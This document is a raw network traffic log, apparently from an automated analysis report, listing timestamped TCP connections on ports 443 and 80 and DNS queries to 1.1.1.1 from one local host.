                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:39.896528006 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:39.896595955 CET44350125116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:39.896692038 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:39.897136927 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:39.897150040 CET44350125116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:39.899333000 CET4435012440.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.028072119 CET4435012440.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.028176069 CET4435012440.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.028245926 CET50124443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.028490067 CET50124443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.028512001 CET4435012440.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.540879965 CET44350125116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.540957928 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.541452885 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.541476011 CET44350125116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.543620110 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:40.543627977 CET44350125116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.201419115 CET44350125116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.201457977 CET44350125116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.201500893 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.201531887 CET44350125116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.201545954 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.201596022 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.201905012 CET50125443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.201942921 CET44350125116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.205935001 CET50126443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.205974102 CET44350126116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.206156969 CET50126443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.206474066 CET50126443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.206484079 CET44350126116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.862493992 CET44350126116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.862611055 CET50126443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.863157034 CET50126443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.863169909 CET44350126116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.865818977 CET50126443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:41.865834951 CET44350126116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:42.541435003 CET44350126116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:42.541520119 CET44350126116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:42.541518927 CET50126443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:42.541583061 CET50126443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:42.552242994 CET50126443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:42.552268982 CET44350126116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.275074959 CET44350123116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.275152922 CET50123443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.275161982 CET44350123116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.275227070 CET50123443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.276177883 CET50123443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.276202917 CET44350123116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.678519964 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.678591967 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.678688049 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.678975105 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:46.678987026 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.380618095 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.380691051 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.381176949 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.381190062 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384212971 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384219885 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384324074 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384337902 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384342909 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384361029 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384391069 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384396076 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384526968 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384542942 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384602070 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384610891 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384635925 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384635925 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384644985 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384658098 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384669065 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384673119 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384692907 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384706974 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384767056 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384776115 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384783983 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.384788036 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.591449022 CET4970980192.168.2.5199.232.210.172
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.596926928 CET8049709199.232.210.172192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:47.597049952 CET4970980192.168.2.5199.232.210.172
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.523874044 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.523947954 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.523962975 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.523998022 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.524174929 CET50132443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.524199009 CET44350132116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.527893066 CET50133443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.527930975 CET44350133116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.528011084 CET50133443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.528270960 CET50133443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:48.528284073 CET44350133116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.178831100 CET44350133116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.180547953 CET50133443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.180998087 CET50133443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.181008101 CET44350133116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.182971954 CET50133443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.182979107 CET44350133116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.302021980 CET44350079162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.302241087 CET44350079162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.302337885 CET50079443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.305823088 CET44350080162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.305907011 CET44350080162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.308535099 CET50080443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.891171932 CET44350133116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.891268969 CET44350133116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.891307116 CET50133443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.891326904 CET50133443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.891598940 CET50133443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.891617060 CET44350133116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.892996073 CET50134443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.893048048 CET44350134116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.893130064 CET50134443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.893318892 CET50134443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:49.893328905 CET44350134116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:50.659718037 CET44350134116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:50.659951925 CET50134443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:50.660356998 CET50134443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:50.660367966 CET44350134116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:50.662467003 CET50134443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:50.662478924 CET44350134116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:51.355524063 CET44350134116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:51.355598927 CET44350134116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:51.355600119 CET50134443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:51.355650902 CET50134443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:51.355802059 CET50134443192.168.2.5116.203.14.4
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:51.355834007 CET44350134116.203.14.4192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:53.212618113 CET4435007323.209.72.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:53.212712049 CET4435007323.209.72.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:53.212825060 CET50073443192.168.2.523.209.72.8
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:53.220632076 CET4435007423.209.72.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:53.220737934 CET4435007423.209.72.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:53.220830917 CET50074443192.168.2.523.209.72.8
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:55.520251036 CET4435011323.44.201.43192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:55.520354033 CET4435011323.44.201.43192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:55.520539045 CET50113443192.168.2.523.44.201.43
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:55.591538906 CET4435011623.44.201.17192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:55.591622114 CET4435011623.44.201.17192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:55.591674089 CET50116443192.168.2.523.44.201.17
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:55.638057947 CET4435011223.44.201.43192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:55.638130903 CET4435011223.44.201.43192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:55.638345003 CET50112443192.168.2.523.44.201.43
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:04.348787069 CET4435011913.69.239.77192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:04.348906994 CET4435011913.69.239.77192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:04.348968029 CET50119443192.168.2.513.69.239.77
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:04.349445105 CET50119443192.168.2.513.69.239.77
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:04.349471092 CET4435011913.69.239.77192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:14.516062975 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:14.516128063 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:14.516200066 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:14.516849041 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:14.516863108 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.300132990 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.300242901 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.302855968 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.302869081 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.303101063 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.307562113 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.307619095 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.307624102 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.307754040 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.355335951 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.492676973 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.492888927 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.493120909 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.493243933 CET50135443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:47:15.493268967 CET4435013540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:17.284779072 CET6150053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:17.300282001 CET53615001.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.276854038 CET5166253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.283384085 CET53516621.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:03.662466049 CET5592953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:03.676537991 CET53559291.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.773951054 CET53550861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.906526089 CET5192853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.906660080 CET5687353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.911480904 CET53523891.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.913381100 CET53519281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.913391113 CET53568731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:14.902267933 CET53560321.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:16.467598915 CET53586391.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.173966885 CET5006253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.174474001 CET5432353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.179426908 CET53596191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.180780888 CET53500621.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.181685925 CET53543231.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:19.175679922 CET5075453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:19.175848961 CET5503653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:19.182830095 CET53507541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:19.183377981 CET53550361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:19.865196943 CET53641361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.523332119 CET5885153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.523530960 CET5749753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.530635118 CET53574971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:28.991080999 CET6441153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:28.991333008 CET6341053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.051295996 CET6314253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.051548958 CET5138353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.059083939 CET53631421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.059293032 CET53513831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.061224937 CET5476053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.061357021 CET5745253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.069442034 CET53574521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.074866056 CET6527353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.075306892 CET5096053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.077773094 CET6349053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.077927113 CET5216953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.084397078 CET53521691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:31.275532961 CET6347153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:31.275773048 CET5324653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:31.282769918 CET53634711.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:31.282841921 CET53532461.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.323586941 CET6236853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.323745012 CET5246253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.324139118 CET5036853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.324327946 CET5574053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.331337929 CET53623681.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.331648111 CET53524621.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.331834078 CET53503681.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.332169056 CET53557401.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.346270084 CET5061953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.346440077 CET6408953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.354885101 CET53506191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.354902983 CET53640891.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.107273102 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.415920973 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.549962044 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.550427914 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.550575018 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.550663948 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.552503109 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.553066969 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.553180933 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.553642988 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.553793907 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.554192066 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.554339886 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.554761887 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.555104017 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.646274090 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.646334887 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.646342993 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.646352053 CET44360337172.64.41.3192.168.2.5
